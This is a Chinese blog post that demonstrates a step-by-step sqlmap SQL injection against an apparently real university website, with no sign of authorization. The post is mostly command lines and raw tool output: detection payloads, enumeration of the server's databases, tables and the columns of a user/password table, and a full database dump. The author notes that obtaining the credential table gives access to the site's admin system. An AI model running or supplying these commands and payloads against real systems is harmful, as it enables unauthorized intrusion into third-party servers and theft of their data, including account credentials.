SQL注入是啥就不解释了。下面演示一个SQL注入的例子

SQL注入点可以自己尝试或用SQL注入漏洞扫描工具去寻找,这里用大名鼎鼎的sqlmap演示一个现成的案例。

1.漏洞试探

  1. root@kali:~# sqlmap -u http://xxx.njnu.edu.cn/fjlist.asp?id=87
  2.  
  3. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  4. http://sqlmap.org
  5.  
  6. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  7.  
  8. [*] starting at ::
  9.  
  10. [::] [INFO] resuming back-end DBMS 'microsoft sql server'
  11. [::] [INFO] testing connection to the target URL
  12. sqlmap identified the following injection points with a total of HTTP(s) requests:
  13. ---
  14. Place: GET
  15. Parameter: id
  16. Type: boolean-based blind
  17. Title: AND boolean-based blind - WHERE or HAVING clause
  18. Payload: id=' AND 8841=8841 AND 'bZbc'='bZbc
  19.  
  20. Type: stacked queries
  21. Title: Microsoft SQL Server/Sybase stacked queries
  22. Payload: id='; WAITFOR DELAY '::'--
  23.  
  24. Type: AND/OR time-based blind
  25. Title: Microsoft SQL Server/Sybase time-based blind
  26. Payload: id=' WAITFOR DELAY '::'--
  27. ---
  28. [::] [INFO] the back-end DBMS is Microsoft SQL Server
  29. web server operating system: Windows or XP
  30. web application technology: ASP.NET, Microsoft IIS 6.0, ASP
  31. back-end DBMS: Microsoft SQL Server
  32. [::] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/xxx.njnu.edu.cn'
  33.  
  34. [*] shutting down at ::

可以看到这个站点是有SQL注入点的,连系统/应用/sql类型都爆出来了。接下来我们来探索一下这个数据库里有些什么。

2.查看数据库

  1. root@kali:~# sqlmap -u http://xxx.njnu.edu.cn/fjlist.asp?id=87 --dbs
  2.  
  3. ...
  4. sqlmap identified the following injection points with a total of HTTP(s) requests:
  5. ---
  6. Place: GET
  7. Parameter: id
  8. Type: boolean-based blind
  9. Title: AND boolean-based blind - WHERE or HAVING clause
  10. Payload: id=' AND 8841=8841 AND 'bZbc'='bZbc
  11.  
  12. Type: stacked queries
  13. Title: Microsoft SQL Server/Sybase stacked queries
  14. Payload: id='; WAITFOR DELAY '::'--
  15.  
  16. Type: AND/OR time-based blind
  17. Title: Microsoft SQL Server/Sybase time-based blind
  18. Payload: id=' WAITFOR DELAY '::'--
  19. ---
  20. [::] [INFO] the back-end DBMS is Microsoft SQL Server
  21. web server operating system: Windows or XP
  22. web application technology: ASP.NET, Microsoft IIS 6.0, ASP
  23. back-end DBMS: Microsoft SQL Server
  24. [::] [INFO] fetching database names
  25. [::] [INFO] fetching number of databases
  26. [::] [INFO] resumed:
  27. [::] [INFO] resumed: BZBB_lw
  28. [::] [INFO] resumed: ChualgXinNS
  29. [::] [INFO] resumed: db_dike
  30. [::] [INFO] resumed: db_dndqjzw
  31. [::] [INFO] resumed: db_njsdjw
  32. [::] [INFO] resumed: db_njsfsy
  33. [::] [INFO] resumed: db_nsddlhj
  34. [::] [INFO] resumed: db_nsdhgxn
  35. [::] [INFO] resumed: db_nsdmba
  36. [::] [INFO] resumed: db_nsdMediaC
  37. [::] [INFO] resumed: db_nsdscw
  38. [::] [INFO] resumed: db_nsdsw
  39. [::] [INFO] resumed: db_nsdswyy
  40. [::] [INFO] resumed: db_nsdswzy
  41. [::] [INFO] resumed: db_nyspjc
  42. [::] [INFO] resumed: db_sdjxjy
  43. [::] [INFO] resumed: db_spaqjc
  44. [::] [INFO] resumed: JiaoCai
  45. [::] [INFO] resumed: maste@
  46. [::] [INFO] resumed: MBA
  47. [::] [INFO] resumed: model
  48. [::] [INFO] resumed: msdb
  49. [::] [INFO] resumed: njnulab
  50. [::] [INFO] resumed: njnupj
  51. [::] [INFO] resumed: nju
  52. [::] [INFO] resumed: nju2222
  53. [::] [INFO] resumed: njuold
  54. [::] [INFO] resumed: njupj2012
  55. [::] [INFO] resumed: Northwind
  56. [::] [INFO] resumed: NSD_ApplicationChemical
  57. [::] [INFO] resumed: NSD_Cnooc
  58. [::] [INFO] resumed: NSD_ElectricalEngineering
  59. [::] [INFO] resumed: NSD_ElectronicInformation
  60. [::] [INFO] resumed: NSD_TeacherSkills
  61. [::] [INFO] resumed: NSD_TeachingTeam
  62. [::] [INFO] resumed: nsddky_sy
  63. [::] [INFO] resumed: nsdsfjdzx
  64. [::] [INFO] resumed: nsdsfjdzxnew
  65. [::] [INFO] resumed: nsglxt
  66. [::] [INFO] resumed: NSHuaKe
  67. [::] [INFO] resumed: NSXinLiXue
  68. [::] [INFO] resumed: NY_JG
  69. [::] [INFO] resumed: pubs
  70. [::] [INFO] resumed: ShangXueYuannew
  71. [::] [INFO] resumed: tempdb
  72. [::] [INFO] resumed: zhongxin
  73. [::] [INFO] resumed: zhongxinold
  74. available databases []:
  75. [*] BZBB_lw
  76. [*] ChualgXinNS
  77. [*] db_dike
  78. [*] db_dndqjzw
  79. [*] db_njsdjw
  80. [*] db_njsfsy
  81. [*] db_nsddlhj
  82. [*] db_nsdhgxn
  83. [*] db_nsdmba
  84. [*] db_nsdMediaC
  85. [*] db_nsdscw
  86. [*] db_nsdsw
  87. [*] db_nsdswyy
  88. [*] db_nsdswzy
  89. [*] db_nyspjc
  90. [*] db_sdjxjy
  91. [*] db_spaqjc
  92. [*] JiaoCai
  93. [*] maste@
  94. [*] MBA
  95. [*] model
  96. [*] msdb
  97. [*] njnulab
  98. [*] njnupj
  99. [*] nju
  100. [*] nju2222
  101. [*] njuold
  102. [*] njupj2012
  103. [*] Northwind
  104. [*] NSD_ApplicationChemical
  105. [*] NSD_Cnooc
  106. [*] NSD_ElectricalEngineering
  107. [*] NSD_ElectronicInformation
  108. [*] NSD_TeacherSkills
  109. [*] NSD_TeachingTeam
  110. [*] nsddky_sy
  111. [*] nsdsfjdzx
  112. [*] nsdsfjdzxnew
  113. [*] nsglxt
  114. [*] NSHuaKe
  115. [*] NSXinLiXue
  116. [*] NY_JG
  117. [*] pubs
  118. [*] ShangXueYuannew
  119. [*] tempdb
  120. [*] zhongxin
  121. [*] zhongxinold
  122.  
  123. [::] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/xxx.njnu.edu.cn'
  124.  
  125. [*] shutting down at ::

3.省略部分日志,可以看到所有的数据库都已经找到了,接下来可以查看具体的表。

  1. root@kali:~# sqlmap -u http://xxx.njnu.edu.cn/fjlist.asp?id=87 -D JiaoCai --tables --threads 5
  2.  
  3. ...
  4.  
  5. [::] [INFO] resuming back-end DBMS 'microsoft sql server'
  6. [::] [INFO] testing connection to the target URL
  7. sqlmap identified the following injection points with a total of HTTP(s) requests:
  8. ---
  9. Place: GET
  10. Parameter: id
  11. Type: boolean-based blind
  12. Title: AND boolean-based blind - WHERE or HAVING clause
  13. Payload: id=' AND 8841=8841 AND 'bZbc'='bZbc
  14.  
  15. Type: stacked queries
  16. Title: Microsoft SQL Server/Sybase stacked queries
  17. Payload: id='; WAITFOR DELAY '::'--
  18.  
  19. Type: AND/OR time-based blind
  20. Title: Microsoft SQL Server/Sybase time-based blind
  21. Payload: id=' WAITFOR DELAY '::'--
  22. ---
  23. [::] [INFO] the back-end DBMS is Microsoft SQL Server
  24. web server operating system: Windows or XP
  25. web application technology: ASP.NET, Microsoft IIS 6.0, ASP
  26. back-end DBMS: Microsoft SQL Server
  27. [::] [INFO] fetching tables for database: JiaoCai
  28. [::] [INFO] fetching number of tables for database 'JiaoCai'
  29. [::] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
  30. [::] [INFO] retrieved:
  31. [::] [WARNING] reflective value(s) found and filtering out
  32.  
  33. [::] [INFO] retrieved: dbo.dtproperties
  34. [::] [INFO] retrieved: dbo.sysconstraints
  35. [::] [INFO] retrieved: dbo.syssegments
  36. [::] [INFO] retrieved: dbo.T_BuildYxJc
  37. [::] [INFO] retrieved: dbo.T_BuildZdJc
  38. [::] [INFO] retrieved: dbo.T_CanYu
  39. [::] [INFO] retrieved: dbo.T_EndDate
  40. [::] [INFO] retrieved: dbo.T_G_BuildYxJc
  41. [::] [INFO] retrieved: dbo.T_G_Bu
  42. [::] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
  43. [::] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
  44. ildZdJc
  45. [::] [INFO] retrieved: dbo.T_G_Ca
  46. [::] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
  47. nYu
  48. [::] [INFO] retrieved: dbo.T_G_EndDate
  49. [::] [INFO] retrieved: dbo.T_G_JiaoCai
  50. [::] [INFO] retrieved: dbo.T_G_News
  51. [::] [INFO] retrieved: dbo.T_G_User
  52. [::] [INFO] retrieved: dbo.T_G_XueYuan
  53. [::] [INFO] retrieved: dbo.T_G_ZhuanYe
  54. [::] [INFO] retrieved: dbo.T_G_ZyToJc
  55. [::] [INFO] retrieved: dbo.T_JiaoCai
  56. [::] [INFO] retrieved: dbo.T_News
  57. [::] [INFO] retrieved: dbo.T_U
  58. [::] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
  59. ser
  60. [::] [INFO] retrieved: dbo.T_XueYuan
  61. [::] [INFO] retrieved: dbo.T_ZhuanYe
  62. [::] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
  63.  
  64. [::] [INFO] retrieved: dbo.T_ZyToJc
  65. Database: JiaoCai
  66. [ tables]
  67. +----------------+
  68. | T_BuildYxJc |
  69. | T_BuildZdJc |
  70. | T_CanYu |
  71. | T_EndDate |
  72. | T_G_BuildYxJc |
  73. | T_G_BuildZdJc |
  74. | T_G_CanYu |
  75. | T_G_EndDate |
  76. | T_G_JiaoCai |
  77. | T_G_News |
  78. | T_G_User |
  79. | T_G_XueYuan |
  80. | T_G_ZhuanYe |
  81. | T_G_ZyToJc |
  82. | T_JiaoCai |
  83. | T_News |
  84. | T_User |
  85. | T_XueYuan |
  86. | T_ZhuanYe |
  87. | T_ZyToJc |
  88. | dtproperties |
  89. | sysconstraints |
  90. | syssegments |
  91. +----------------+
  92.  
  93. [::] [WARNING] HTTP error codes detected during run:
  94. (Internal Server Error) - times
  95. [::] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/xxx.njnu.edu.cn'
  96.  
  97. [*] shutting down at ::

4.找到自己想要的表,如果你找到了存放user和passwd的表,那么你就可以后台登录他们的管理系统了。

  1. root@kali:~# sqlmap -u http://xxx.njnu.edu.cn/fjlist.asp?id=87 -D ShangXueYuannew -T T_User --columns --threads 5
  2.  
  3. ...
  4. HTTP(s) requests:
  5. ---
  6. Place: GET
  7. Parameter: id
  8. Type: boolean-based blind
  9. Title: AND boolean-based blind - WHERE or HAVING clause
  10. Payload: id=' AND 8841=8841 AND 'bZbc'='bZbc
  11.  
  12. Type: stacked queries
  13. Title: Microsoft SQL Server/Sybase stacked queries
  14. Payload: id='; WAITFOR DELAY '::'--
  15.  
  16. Type: AND/OR time-based blind
  17. Title: Microsoft SQL Server/Sybase time-based blind
  18. Payload: id=' WAITFOR DELAY '::'--
  19. ---
  20. [::] [INFO] the back-end DBMS is Microsoft SQL Server
  21. web server operating system: Windows or XP
  22. web application technology: ASP.NET, Microsoft IIS 6.0, ASP
  23. back-end DBMS: Microsoft SQL Server
  24. [::] [INFO] fetching columns for table 'T_User' in database 'ShangXueYuannew'
  25. [::] [INFO] retrieved:
  26. [::] [WARNING] reflective value(s) found and filtering out
  27.  
  28. [::] [INFO] retrieving the length of query output
  29. [::] [INFO] retrieved:
  30. [::] [INFO] retrieved: FileTheme
  31. [::] [INFO] retrieving the length of query output
  32. [::] [INFO] retrieved:
  33. [::] [INFO] retrieved: varchar
  34. [::] [INFO] retrieving the length of query output
  35. [::] [INFO] retrieved:
  36. [::] [INFO] retrieved: Pwd
  37. [::] [INFO] retrieving the length of query output
  38. [::] [INFO] retrieved:
  39. [::] [INFO] retrieved: varchar
  40. [::] [INFO] retrieving the length of query output
  41. [::] [INFO] retrieved:
  42. [::] [INFO] retrieved: Role
  43. [::] [INFO] retrieving the length of query output
  44. [::] [INFO] retrieved:
  45. [::] [INFO] retrieved: varchar
  46. [::] [INFO] retrieving the length of query output
  47. [::] [INFO] retrieved:
  48. [::] [INFO] retrieved: UserFile
  49. [::] [INFO] retrieving the length of query output
  50. [::] [INFO] retrieved:
  51. [::] [INFO] retrieved: varchar
  52. [::] [INFO] retrieving the length of query output
  53. [::] [INFO] retrieved:
  54. [::] [INFO] retrieved: UserId
  55. [::] [INFO] retrieving the length of query output
  56. [::] [INFO] retrieved:
  57. [::] [INFO] retrieved: varcha_ / (%)
  58. [::] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
  59. [::] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')
  60. [::] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
  61. [::] [INFO] retrieved: varchar
  62. [::] [INFO] retrieving the length of query output
  63. [::] [INFO] retrieved:
  64. [::] [INFO] retrieved: UserName
  65. [::] [INFO] retrieving the length of query output
  66. [::] [INFO] retrieved:
  67. [::] [INFO] retrieved: va_cha_ / (%)
  68. [::] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
  69. [::] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
  70. [::] [INFO] retrieved: varchar
  71. [::] [INFO] retrieving the length of query output
  72. [::] [INFO] retrieved:
  73. [::] [INFO] retrieved: UserNo
  74. [::] [INFO] retrieving the length of query output
  75. [::] [INFO] retrieved:
  76. [::] [INFO] retrieved: int
  77. Database: ShangXueYuannew
  78. Table: T_User
  79. [ columns]
  80. +-----------+---------+
  81. | Column | Type |
  82. +-----------+---------+
  83. | FileTheme | varchar |
  84. | Pwd | varchar |
  85. | Role | varchar |
  86. | UserFile | varchar |
  87. | UserId | varchar |
  88. | UserName | varchar |
  89. | UserNo | int |
  90. +-----------+---------+
  91.  
  92. [::] [WARNING] HTTP error codes detected during run:
  93. (Internal Server Error) - times
  94. [::] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/xxx.njnu.edu.cn'
  95.  
  96. [*] shutting down at ::

5.甚至你可以把想要的数据库下载下来,在本地慢慢研究

  1. root@kali:~# sqlmap -u http://xxx.njnu.edu.cn/fjlist.asp?id=87 -D ShangXueYuannew --dump --threads 5

时间相当长,完了后就能看到SQL的具体内容了。

  1. Database: ShangXueYuannew
  2. Table: T_Acceptance
  3. [ entries]
  4. +-----+-----+------------+------------+------------+------------+---------------------------+--------+
  5. | aId | aNo | aRar | aPdf | aWord | aFlash | aTitle | aState |
  6. +-----+-----+------------+------------+------------+------------+---------------------------+--------+
  7. | NULL | | .rar | NULL | NULL | NULL | NULL | - |
  8. | | | NULL | .pdf | .doc | .swf | 江苏省高等学校实验教学示范中心2011年验收申请表 | - |
  9. | | | NULL | .pdf | .doc | .swf | 江苏省高等学校基础课实验教学示范中心立项申报表 | - |
  10. | | | NULL | .pdf | .doc | .swf | 支撑材料之一:经济管理教学实验中心整体介绍 | - |
  11. | | | NULL | .pdf | .doc | .swf | 支撑材料之二:实验室相关政策措施及规章制度 | - |
  12. | | | NULL | .pdf | .doc | .swf | 支撑材料之三:课程实验教学计划及实验项目 | - |
  13. | | | NULL | .pdf | .doc | .swf | 支撑材料之四:典型自编课程实验讲义 | - |
  14. | | | NULL | .pdf | .doc | .swf | 支撑材料之五:典型多媒体课件简介 | - |
  15. | | | NULL | .pdf | .doc | .swf | 支撑材料之߸ߢ经济ߢ理教学实验中心建设成果 | - |
  16. | NULL | | .rar | NULL | NULL | NULL | NULL | - |
  17. +-----+-----+------------+------------+------------+------------+---------------------------+--------+

实战SQL注入的更多相关文章

  1. 【Hibernate实战】源码解析Hibernate参数绑定及PreparedStatement防SQL注入原理

        本文采用mysql驱动是5.1.38版本. 本篇文章涉及内容比较多,单就Hibernate来讲就很大,再加上数据库驱动和数据库相关,非一篇文章或一篇专题就能说得完.本文从使用入手在[Spr ...

  2. 渗透测试初学者的靶场实战 1--墨者学院SQL注入—布尔盲注

    前言 大家好,我是一个渗透测试的爱好者和初学者,从事网络安全相关工作,由于爱好网上和朋友处找了好多关于渗透的视频.工具等资料,然后自己找了一个靶场,想把自己练习的体会和过程分享出来,希望能对其他渗透爱 ...

  3. SpringBoot微服务电商项目开发实战 --- api接口安全算法、AOP切面及防SQL注入实现

    上一篇主要讲了整个项目的子模块及第三方依赖的版本号统一管理维护,数据库对接及缓存(Redis)接入,今天我来说说过滤器配置及拦截设置.接口安全处理.AOP切面实现等.作为电商项目,不仅要求考虑高并发带 ...

  4. 渗透测试初学者的靶场实战 3--墨者学院SQL注入—宽字节盲注

    墨者SQL注入-MYSQL数据库实战环境 实践步骤 1. 决断注入点 输入单引号,提示错误信息: 输入and 1=1 返回页面正常: 输入 and 1=2 返回正常 输入-1,返回异常: 2. 带入s ...

  5. 渗透测试初学者的靶场实战 2--墨者学院SQL注入—报错盲注

    墨者SQL注入-MYSQL数据库实战环境 实践步骤 1. 决断注入点 输入单引号,提示错误信息: 输入and 1=1 返回页面正常: 输入 and 1=2 返回正常 输入-1,返回异常: 2. 带入s ...

  6. [红日安全]Web安全Day1 - SQL注入实战攻防

    本文由红日安全成员: Aixic 编写,如有不当,还望斧正. 大家好,我们是红日安全-Web安全攻防小组.此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名 ...

  7. 从原理—实战分析SQL注入

    前言 SQL注入是web安全中最常见的攻击方式,SQL注入有很多方法,但如果只知道payload或只用用sqlmap,不知道原理,感觉也很难掌握,这次就总结一下我所遇到的SQL注入方法,原理分析+题目 ...

  8. 【攻防实战】SQL注入演练!

    这篇文章目的是让初学者利用SQL注入技术来解决他们面临的问题, 成功的使用它们,并在这种攻击中保护自己. 1.0 介绍 当一台机器只打开了80端口, 你最依赖的漏洞扫描器也不能返回任何有用的内容, 并 ...

  9. [漏洞案例]thinkcmf 2.x从sql注入到getshell实战

    0X00 前言 这个案例是某项目的漏洞,涉及敏感的地方将会打码. 很久没更新博客了,放一篇上来除除草,新的一年会有所转变,以后会有更多领域的研究. 下面是正文 0X01 正文 某厂商某个网站用的是th ...

随机推荐

  1. IOS开发中常用一下方法

    1.获得屏幕的宽高 [UIScreen mainScreen].bounds.size.width [UIScreen mainScreen].bounds.size.height 2.Iphone版 ...

  2. Swift开发第十篇——可变参数函数&初始化方法顺序

    本篇分为两部分: 一.Swift中的可变参数函数 二.初始化方法的顺序 一.Swift中的可变参数函数 可变参数函数指的是可以接受任意多个参数的函数,在 OC 中,拼接字符串的函数就属于可变参数函数 ...

  3. xdebug + wincachegrind

    ;;;;;;;php.ini;;;;;;;;;;;;;;;;;; [Xdebug]zend_extension=D:\Xampp\php\ext\php_xdebug.dll;开启自动跟踪xdebug ...

  4. 在线研讨会webinars

    我是怎么一步一步找到这里的?  jedox-jedox Webinars (不懂意思)--->google [      webinars      open source ],->htt ...

  5. 利用PHPMailer 来完成PHP的邮件发送

    翻起之前的代码看了一下,还是发表到这里,以后容易查找. 以下的两个文件在这里下载 http://download.csdn.net/detail/u013085496/9673828 也可以直接上gi ...

  6. 面试题整理:SQL(一)

    1.横纵表转换 A表 Name Course Grade Alex English 80 Alex Chinese 70 Alex Japanese 85 Bob English 75 Bob Chi ...

  7. Javascript之旅——第一站:从变量说起

    工作这几年,js学的不是很好,正好周末有些闲时间,索性买本<js权威指南>,大名鼎鼎的犀牛书,好好的把js深入的看一看.买过这本 书的第一印象就是贼厚,不过后面有一半部分都是参考手册. 一 ...

  8. Maven 打包涉及证书文件问题

    当使用maven-assembly-plugin或者maven-shade-plugin打包时,如果涉及到证书文件,一定设置过滤,否则证书文件会被做修改.报异常: java.io.IOExceptio ...

  9. hibernate总记录数查询和分页查询

    //参考代码 //第一种方法: String hql = "select count(*) from User as user"; Integer count = (Integer ...

  10. Confluent介绍(二)--confluent platform quickstart

    下载 http://www.confluent.io/download,打开后,显示最新版本3.0.0,然后在右边填写信息后,点击Download下载. 之后跳转到下载页面,选择zip 或者 tar都 ...